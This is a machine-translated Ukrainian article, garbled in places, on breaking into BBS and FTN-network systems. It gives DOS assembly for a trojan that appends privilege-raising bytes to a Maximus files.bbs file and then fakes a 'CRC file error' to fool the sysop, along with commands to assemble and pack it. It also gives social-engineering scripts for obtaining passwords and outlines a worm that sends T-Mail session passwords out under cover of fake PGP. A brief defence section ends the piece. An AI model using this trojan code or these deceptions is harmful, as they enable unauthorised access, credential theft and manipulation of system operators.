BBS І FTN-СЕТИ b> p>
5 цьому розділі описані методи
злому BBS і FTN-мереж, як
програмні, так і "обман-
ные ", Представлений вихідний
текст програми-зломщика
з коментарями. Детально
розказано про "слабких міс-тах
" різних програм для
BBS і FTN-мереж. Даються ре-
комендаціі по захисту компь-
ютера від несанкціонований-
ного проникнення. p>
BBS - Bulletin Board System (електронна дошка оголошень). Це не-
великий інформаційний центр на базі мікрокомп'ютера (з вінчес-
тером великого обсягу), до якого користувачі можуть підключитися
через свій комп'ютер по телефонній мережі в режимі точка - точка. p>
Працюючи з BBS, користувачі можуть не тільки скопіювати звідти име-
ющійся файл, але і залишити свій. Файлом може бути як лист,
так і звичайна програма. Як правило, BBS працює в нічний час,
а вдень це звичайний телефонний номер. Головним на BBS є сис-
темний оператор (SysOp), який і призначає її правила і тематику.
Послуги BBS часто є безкоштовними, для зв'язку з нею досить
звичайної термінальної програми. При першому вході потрібно зарегіст-
центрувати, потім абоненту виділяється певний проміжок вре-
мені для роботи. Часто виділяється часу недостатньо, тоді появ-
ляется потреба до злому BBS. Про те, як треба телефонувати на подібні
BBS, як отримувати звідти файли і писати листи, можна дізнатися в спе-
соціальне літературі. Поставлене завдання - розповісти читачеві, ка-
ким чином можна підвищити собі рівень доступу або отримати пів-
ний доступ до комп'ютера. Для системних операторів це буде
зайвим приводом замислитися над тим, як страшні наслідки безгра-
мотності ... p>
Злом BBS b> p>
Існує велика кількість програм, призначених для ство-
вання та підтримки роботи BBS. Розглянемо найбільш популярну серед
них - Maximus. p>
Несанкціоновано проникнути на BBS, отримати доступ до закритих
областям, знищити інформацію - такі завдання ставить перед собою
зломщик. p>
Існують так звані списки файлів, у яких міститься
ін-формація про доступні користувачам цієї BBS ресурсах. Як правило,
такі списки є в кожної спеціальної тематичної конференції.
Користувачі можуть скопіювати звідти який-небудь файл або залишити
свій. У програмі Maximus списком усіх файлів, доступних у конфе-
Ренцо, є файл з назвою files.bbs. p>
Спеціально для цієї програми створена мова програмування, схожий
з мовами С і Pascal. На ньому можна писати власні програми p>
під BBS. Швидше за все, саме тому більшість системних опера-
торів вважають за краще використовувати Maximus. Після компіляції напи-
санній програми її можна додати в загальну базу Maximus, і вона
почне працювати. p>
Кожна скомпільованій програма набуває певної мас-
ку файлу. Скомпільованій МЕС-програма має маску *. bbs, схо-
жую з маскою списку файлу. Зазвичай в таких файлах містяться списки,
але якщо в коді зустрічаються будь-які службові команди, вони будуть
виконані. Цим зломщик і може скористатися. p>
У Maximus існують дві мови: МІС і МЕХ. Мова МІС дуже
простий, розібратися в ньому може кожен. Він дозволяє оперувати раз-
особистими даними, заставками на BBS, базою користувачів. Систем-
ний оператор обов'язково повинен знати цю мову. p>
Використовуючи команду "PRIV_UP" мови МІС системний оператор мо-жет
без особливих зусиль підвищувати рівень користувача, за умови,
що останній буде писати і відправляти файли на станцію. З підвищення ефектив-
ням рівня, користувач отримує додаткові можливості
(збільшується доступне для роботи час, обсяг інформації, кото-
рую можна отримати з BBS). Цим і може скористатися хакер. Йому
залишається тільки знайти BBS, що працює на програмі Maximus, на ко-
торою є багато файлових конференцій. При цьому одна з цих кон-
ференції повинна бути порожньою (тобто в ній не повинно бути файлу
files.bbs, що містить доступні файли у даній конференції). Таким
чином, залишається перевірити тільки одна умова - якщо все копіюючи-
мі на BBS файли поміщаються в конференцію, яка була обрана
останній раз, то таку BBS можна зламати без особливих зусиль. Хаке-
ру залишається тільки створити файл files.тес, записати в нього команду
PRIV_UP, потім відкомпілювати цей файл за допомогою компілятора
Мессі (тепер він буде називатися files.bbs) і відправити його на BBS.
З цього моменту хакер може піднімати свій рівень доступу, просмат-
рівая дану конференцію, поки він не досягне рівня системного
оператора станції. Після цього комп'ютер виявиться повністю в його
розпорядженні. p>
Якщо під рукою не виявилося компілятора Месія, що створити files.bbs
можна і вручну. Для цього потрібно створити файл files.bbs, а потім ввесь-
ти в нього команду підвищення рівня - мовою Maximus це всього три
символу (код перше - 23h, наступні два - символи pU). p>
Ще один спосіб злому BBS розрахований на неписьменних системних опе-
ратора, що не володіють глибокими знаннями. Він полягає в тому,
що на станцію засилається програма (причому байдуже, куди вона
потрапить), яка сама додасть команду підвищення рівня в файл
files.bbs. Під час перегляду доступних файлів хакеру автоматично
буде підніматися рівень. Нижче наведено текст схожою вихідної
програми - фантазія тут може бути безмежна. Ця програма до-
бавляться в файл files.bbs байти, що підвищують рівень користувачеві.
Після того, як системний оператор запустить цю програму на своєму комп'ютері
, програма шукає файл files.bbs і дописує туди три бай-
та. Наведений приклад розрахований на системних операторів, які
тримають свої файли в каталозі, за замовчуванням пропонованому програмою
для установки. Хоча можна додати пошук files.bbs по всьому вінчесте-
ру комп'ютера. p>
assume cs: cseg, ds: cseg
cseg segment
org 100h
start: p>
. Знайдемо файл FILES.BBS
mov ah, 4Eh
mov dx.offset fname
mov cx, 20h
int 21 h p>
; Якщо файл відсутній, то вийдемо з програми -
; тут нічого виправляти
jc exit p>
; 0ткроем знайдений файл
mov ax, 3D02h
mov dx, 9Eh
int 21 h
jc exit p>
-. Встановимо покажчик читання/запису в кінець файлу
mov bx.ax
mov ax, 4202h
Хог сх.сх
xor dx, dx
int 21h p>
Записуємо в файл три байти
mov ah, 40h
mov cx, 3 p>
mov dx.offset bytes
int 21 h
jc exit p>
; 3акроем файл
mov ah, 3Eh
int 21 h p>
[видамо повідомлення про помилку і вийдемо в DOS. Справа в тому,
; що відпрацьовану програма не повинна викликати підозр
системного оператора. Мета - примусити системного оператора p>
думати, що файл пошкоджений. Можливо, він допустить, що іноді
; при передачі файлів відбуваються помилки, і тому файл
; міг стати непрацездатним
exit: p>
[видамо повідомлення про помилку
mov ah, 09h p>
mov dx, offset message
int 21 h p>
; Вихід у DOS
mov ah, 4Ch
int 21 h p>
; Mycop - спеціально для того, щоб упакувати
; файл утилітою PKLITE
Garbage db 12000 dup ( "A") p>
; Файл "FILES.BBS"
fname db "files.bbs", 0 p>
; Повідомлення про помилку
message db "CRC file error", 13,10, "$" p>
. Записувані байти
bytes db 23h, "pU"
cseg ends
end start p>
Після того, як файл відкомпілювати, його потрібно упаковувати, щоб
системний оператор нічого не запідозрив. Цей файл буде містити
велика кількість незрозумілих символів, і при швидкому перегляді
розпізнати приховану в ньому програму практично неможливо. p>
tasm.exe vzlom.asm
tlink.exe vzlom.obj/t
pklite vzlom.com p>
Після цього файл відправляється на BBS і коментується як демонстр-
раціону програма або як утиліта для DOS. Далі зломщикові
залишається тільки чекати, поки системний оператор запустить файл. Через
деякий час можна телефонувати і насолоджуватися. Даний метод не сра-
ботає, якщо ця опція File Titles в Maximus замінено на їй по-
добную. p>
Отримання пароля BBS без злому b> p>
Розглянуті вище способи злому BBS припускають наявність
у користувача базових знань про систему. Тепер трохи про те, як
можна дістати пароль ще простіше. Практично на кожній BBS суще-
обхідних документів недосвідчені користувачі, які мають високий рівень доступу
(інформація про рівень доступу користувачів BBS доступна майже
завжди). Якщо ж такого пункту немає, то "доброго" користувача завжди
можна обчислити, наприклад, за часом, який він проводить на стан-ції
, або за обсягом скопійованій і надісланої ним інформації.
Отже, визначивши людини, паролем якого непогано заволодіти, пишемо
йому листа про те, що з технічних причин (причину придумуючи-
їм будь-яку, головне правдоподібну) йому слід змінити свій робо-
чий пароль (пропонуємо новий, наприклад "НАСК_01"). Після того, як
користувач змінить свій пароль (на це йому потрібно відвести дня два-
три, бо в один день він може не подзвонити, в іншій - тільки
змінить пароль, загалом, час йому знадобитися), можна беспрепят-
ного входити під його ім'ям і користуватися системою. Головне, що-
б лист був написаний від імені системного оператора або якого-
або адміністратора даної системи. Якщо система не дозволяє
змінювати ім'я адресата в полі FROM, варто зайти в неї під іншим име-
ньому (наприклад, Mr. CoSysOp) і написати такий лист. Напевно,
не треба попереджати, що всі дані, вказані при реєстрації під
завідомо неправдивим ім'ям, не повинні бути справжніми. p>
Можна запропонувати ще один спосіб проникнення - метод "забувши-
ня пароля". Вся хитрість в тому, що при вході в систему вказується
ім'я будь-якого користувача цієї BBS, пароль якого, природно,
не відомий. Після невдалих спроб введення пароля (не треба намагатися
його підібрати, краще зробити вигляд, що пароль забутий, вводячи різні
слова, типу Sprite, Cola і так далі) потрібно скласти лист системно-
му оператору з проханням поміняти "забутий" пароль на інший. Укази-
ваем новий пароль, а потім створюємо жалісну історію про ка-
ком-небудь хакера, нібито підібрала наш пароль на інший BBS або
взагалі в Інтернет, через що доводиться використовувати на всіх систе-
мах різні паролі. Якщо системний оператор не дуже досвідчений, вис-
лушей таку жахливу історію він обов'язково увійде до положення не-
Щасного і виконає його прохання - поміняє поточний пароль на
запропонований. Далі - повна свобода дій. Працездатність
даного методу залежить від того, наскільки досвідчений оператор, а також
переконлива чи вигадана історія. Прочитавши її, системний оператор
не повинен і припустити, що його обманюють. p>
Злом FTN-мереж b> p>
Що можна сказати про широко використовуваної технології FTN? Множ-
ство лазівок для злому. Чого вартий поштову файл РКТ, що містить
в собі незашифрований пароль, дізнатися який ніяких проблем не
становить! А файли з паролями у поважному усіма T-Mail, що зберігають-
ся в нешифрованому вигляді і доступні будь-якій грамотній людині,
втім, як і всі конфігураційні файли найбільш поширений-
них програм для роботи з FTN? На основі подібних промахів в раз-
розробці вже давно написані програми, що дозволяють зламати ту чи
іншу BBS, викликати режим DoorWay і створити з віддаленим сервером
все, що завгодно. Однак це ще не межа можливостей програміста.
Подумаєш, зламати BBS! Влада над однією з BBS - ніщо в порівняй-
нії з тим, що хакер може тримати у своїй руці пошту від сотень поштово-
вих вузлів, відправляти пошту від чужого імені, діяти від імені дру-гого
члена або користувача FTN. Фантастика? Ні - реальність. p>
Шанувальники Едгара По напевно знають вислів "Черв'як-Победи-
тель". Власне, будь-який грамотно написаний "хробак" стане
победи-
вачем, якщо вийде на свободу. Особливо з застосуванням свіжих ідей.
Застосовуючи технологію СМ (саморозмножуються механізми), називаючи-
емую в народі "комп'ютерні віруси", можна досягти чималого. p>
Включивши в свій СМ деяку особливість, замість звичної десть-
рукціі можна отримати парольний доступ до багатьох поштовим вузлів
з усіма наслідками, що випливають звідси наслідками. Як відомо, при ус-
тановка з'єднання між двома FTN-Мейлер вони порівнюють
свої адреси і паролі. Тобто спочатку хост одержує основну адресу
того, хто телефонує Мейлера і пароль на сесію. Якщо в конфігурації хоста
вказані адреса і пароль того, хто телефонує і вони збігаються з пред'явленим
паролем, хост показує дзвонячому свій пароль і при збігу
таких відбувається парольна сесія. У переважній більшості випадків
електронна пошта передається тільки в парольний сесії,
інакше будь-який Мейлер не може пред'явити хосту підставний адресу і заб-
рать пошту, призначену для інших. У даному випадку для того,
щоб перехоплювати чужу електронну пошту або діяти від
особи будь-якого системного оператора, необхідно дізнатися паролі на
сесію той, хто телефонує системи і хоста, що чекає дзвінка. Хтось іронії-
но посміхнеться: "Як же їх можна дізнатися, якщо немає можливості
"прикинутися хостом", щоб тих, хто телефонує система показала свої паролі,
якщо вона телефонує зовсім за іншим номером телефону?! ". Зрозуміло.
Але це не потрібно. Хтось скаже: "У такому випадку отримати ці паро-
чи і від хоста не можна, оскільки він не буде висувати свій пароль
і не включить парольний сесію, поки не побачить, що запропонований
пароль збігається з його паролем! "Звичайно. Але це теж не потрібно.
Що ж робити? Справа в тому, що й хост, і тих, хто телефонує система мо-
гут піднести свої паролі "на блюдечке". Для цього не треба за-
хвативать в заручники сім'ю системного оператора або пропонувати
мільйони доларів господареві системи - досить розмістити на кому-
пьютере системного оператора непомітну програму, яка ці па-
ролі знайде і відправить на який-небудь із зазначених FTN-адрес.
Ось і все. Більше нічого не потрібно. p>
Тепер кілька можливостей реалізації цього плану. У країнах
колишнього СРСР найбільш часто використовується DOS-сумісний мей-
лер Андрія Йолкіна T-Mail, тому принципи злому розглянуті на
прикладі системи, що працює саме на його основі. Деякі
користуються програмою Антона Дейнова "SantaFox-Mail", принципи
її злому схожі, крім того, зламати цю систему набагато легше бла-
цію вбудованої функції DoorWay. Але про це нижче. Отже, що ж
програма повинна зробити з системою, щоб заповітні паролі нако-
нец-то були отримані? Власне, алгоритм досить простий, і описати
його можна приблизно так: p>
1. Визначення розташування програми T-Mail на жорсткому диску
системи. p>
2. Визначення розташування конфігураційних файлів системи. p>
3. Витяг списку паролів і адрес з конфігурації системи. p>
4. Шифрування списку паролів і адрес з емуляцією PGP-кодування. p>
5. Відправлення зашифрованого списку паролів і адрес через ап-
лінка по роутинг на систему зломщика. p>
Тепер розглянемо можливі способи реалізації. Теоретично це
не складно. p>
Як правило, системні оператори тримають свій T-Mail на жорсткому дис-
ке. Перше завдання - визначити, куди ж оператор сховав своє "заховай-
вище ". Тут-то і намічається розділення. Можна написати" Трої ",
підсадити його в яку-небудь конкретну систему і чекати, коли ця
система надішле свої паролі поштою. Але можна написати і "вірус",
розходиться на декілька поштових вузлів, після чого всі заражені
вузли повідомлять паролі на сесії з усіма своїми парольний лінками.
Можна шукати T-Mail по всьому жорсткого диску за допомогою рекурсивно-
го обходу всіх логічних дисків та вкладених тек. Зрозуміло, що
цей метод не так вже делікатний, оскільки системний оператор може
помітити, що якась програма протягом декількох хвилин почім-
му-то займає вінчестер. Від такої дурості відмовимося. Інша справа,
якщо цим буде займатися вірус. Чому? Та тому, що блешні-
ство вірусів відстежують виклики функції 4Bh DOS-переривання 21h
для зараження програм. У такому разі, що заважає цьому вірусу ана-
ціалізуватися запущені програми на предмет "а не T-Mail чи це ча-
сом? "і знаходити" скарби "саме таким чином? Нічого. Аналіз
правильніше буде вести не тільки по імені запускається файла, пото-
му що системний оператор міг перейменувати програму, а в даному
випадку необхідна максимальна надійність. Тому краще за все від-
лавлівать T-Mail за постійною сигнатурі ЕХЕ-файла. p>
Дізнавшись, де знаходиться програма T-Mail, можна визначити, де знаходять-
ся її конфігураційні файли. Якщо під час запуску T-Mail ключ "-С" не
заданий (до речі, перехоплення командного рядка - це ще один аргумент
на користь того, що пошук програми коректніше виконувати за допомогою
вірусу), основним файлом конфігурації є "T-MAIL.CTL", на-
ходить в тому ж каталозі, що і T-Mail. При запуску програми
ключ "-С" задає шлях та ім'я основного конфігураційного файлу, ко-
торий знадобиться для злому. Так що необхідно передбачити обидва
варіанта запуску. Після визначення місця розташування основного p>
конфігураційного файлу потрібно отримати шлях ще до двох файлів -
файлу паролів та файлу підстановок (паролі можуть перебувати в обох
файлах). Важливе зауваження: якщо пароль для будь-якого адреси вказано
у файлі підстановок, його дублер з файлу паролів ігнорується. p>
Шлях до файлу паролів вказаний у змінній Security, до файлу підстав-
вок - в змінній SubstList. Змінна конфігураційного файлу -
це рядок, що починається зі спеціальних слів. Наприклад, рядок: p>
Security C: NETWORKT-MAILPASSWORDS.LST p>
називається змінною Security і містить шлях та ім'я файлу паролів,
в той час як рядок p>
SubstList C: NETWORKT-MAILSUBST.LST p>
називається, відповідно, змінної SubstList і містить шлях
та ім'я файлу підстановок. Зрозуміло, було б небажано відправ-
лять ці два файли вкладенням (attach), оскільки воно може поті-
ряться. Надійніше передати ці текстові файли по електронній пошті
у вигляді звичайного листа. Тут виникає проблема: якщо системний
оператор станції, через яку проходитиме це послання (адже
всім відомо про його право читати транзитну пошту), виявить паро-
чи, він негайно попередить про це того оператора, у кого ці па-
ролі були вкрадені. Останній домовиться з усіма лінками про но-вих
паролі, і всі старання виявляться марними. Тобто з метою
конспірації доведеться зашифрувати, щоб при його перегляді
здавалося, що воно містить прикріплений файл. Зрозуміло, це
не обов'язково повинен бути справжній PGP, достатньо лише зовніш-
нього подібності і неможливості швидко розшифрувати засекречене
послання. Це непогана гімнастика для розуму, оскільки хакер повинен
вміти не тільки розшифровувати, а й маскуватися, не тільки ло-
мати, але й будувати. p>
Тепер потрібно вибрати адресу, на яку прийде цей лист. Желатель-
але відправити його по e-mail в Internet через FTN-Internet гейт. Справа
в тому, що в такому разі потерпілому системному оператору буде
дуже складно знайти відправника. Очевидно, у цьому листі поле
"From:" і зворотну адресу повинні бути підставними. Це зіб'є сис-
темного оператора з пантелику, і він не стане видаляти або затримувати
лист, особливо якщо в нього додані "зайві" клуджі "(c) Via:".
Про те, як створити нетмейл листа, можна прочитати в FTS. p>
Чому ж SantaFox-Mail зламати набагато простіше? Справа в тому, що
в основному файлі конфігурації SF-Mail є змінна, ука-
ни опиняються пароль на режим DoorWay. Від "хробака" потрібно тільки за-
дати якої-небудь заздалегідь відомий пароль на користування DoorWay,
після чого потрібно з'єднатися термінальної програмою з цієї систе-
мій і набирати це слово. Потрапивши в DoorWay, файли паролів і підстароста
новок можна вкрасти "голими руками". Звичайно, якщо системний опе-
ратора помітить, що хтось брав у нього ці файли, він прийме
відповідних заходів. Крім того, після зміни паролів можуть
з'явитися збої в роботі системи - користувачі будуть намагатися ввійти
в DoorWay зі старими паролями, але вони не будуть працювати. Ясно, що
оператор про це дізнається дуже скоро. p>
Як було показано в попередній частині, "хробак" може не тільки Воро-
вать паролі, але і задавати свої. В T-Mail немає режиму DoorWay, зате
є так званий "головний пароль системи", заданий в змін-
ної T-Password основного конфігураційного файлу. Змінивши цей
пароль, можна послати на віддалену систему лист з відповідним-
ські вказівками до дій і домогтися потрібного результату. p>
Про вказівках докладно написано в документації за програмою T-Mail,
але потрібно пам'ятати, що системний оператор буде повідомлена про всі
невідповідності та збої в роботі системи. p>
Безпека вашої BBS b> p>
Якщо у вас вдома стоїть власна BBS або ви тільки збираєтеся
її відкрити, спочатку потрібно подбати про її безпеку. p>
По-перше, перш ніж створити свою BBS, треба вибрати програму для
неї. Чим більше можливостей надає програма, тим більше
всіляких лазівок, якими може скористатися хакер. У Maxi-
mus ці лазівки вже описані - краще за все не користуватися цією про-
грамів. Якщо Maximus все-таки використовується, краще не встановлювати
Ш більше ніяких додаткових утиліт, оскільки саме вони можуть
• I, послужить передумовою проникнення хакера на BBS. DOS-SHELL
1В1 луііс відразу прибрати з BBS. Ніколи нікому не можна розкривати свої па-
1В (1алі 'копіювати інформацію про користувачів також не варто. Бережи-
| В Т ^ 5 троянських програм, копіюються користувачами. Їх можна про-
| Н | вірячи або відладчиком, або дизассемблер, іншого способу немає,
| У хіба що не запускати їх зовсім. p>
Особливу увагу потрібно приділити тек. Ніколи не встановлюється
вайт програмний продукт в директорію, що пропонується програмою
за умовчанням. Це, безсумнівно, може полегшити роботу будь-якої троян-
ської програмі. Також не варто запускати маленькі файли, що потрапили
на станцію ззовні. Зазвичай такі програми і є "бомбами оп-
ределенного дії". p>
Взагалі найкращий захист - це напад. Справа в тому, що хакерами мно-
Гії називають себе абсолютно безпідставно. Хакер на замовлення фір-
ми-виробника ламає їх системи, таким чином знаходячи лазівки,
які можуть бути використані подібними зломщиками. Тобто
хакер шукає "дірки", а компанія їх закриває. Таким чином, суще-
обхідних документів системи, які зламати практично неможливо. p>